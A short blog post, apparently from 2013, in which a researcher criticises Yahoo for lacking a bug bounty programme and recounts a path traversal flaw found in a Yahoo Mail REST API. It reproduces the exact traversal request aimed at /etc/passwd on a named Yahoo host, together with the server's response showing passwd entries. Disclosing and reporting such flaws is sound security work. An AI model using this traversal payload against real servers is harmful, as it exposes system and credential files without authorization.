Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking
— Reuters Tech (@ReutersTech) May 17, 2013
This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, Paypal, Etsy, etc (list of reward programs @bugcrowd). Last year I discovered a LFI/Path Traversal vulnerability in a REST-API used by Yahoo Mail and I got a automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.
GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1 Host: prod1.rest-notify.msg.yahoo.com HTTP/1.1 200 OK Connection: close Expires: Thu, 15 Apr 2020 20:00:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 29676 root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root:/bin/sh daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin
Some minutes later I got a automated reply from Yahoo Security Contact
Nils, Thank you for contacting Yahoo!. These issues have been passed along to the correct teams to investigate. Should a fix be required, we will again contact you and ask that you see the issues as resolved. Thanks again, Yahoo! Security ContactDays later the issue was fixed. But no more replies from them!
Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.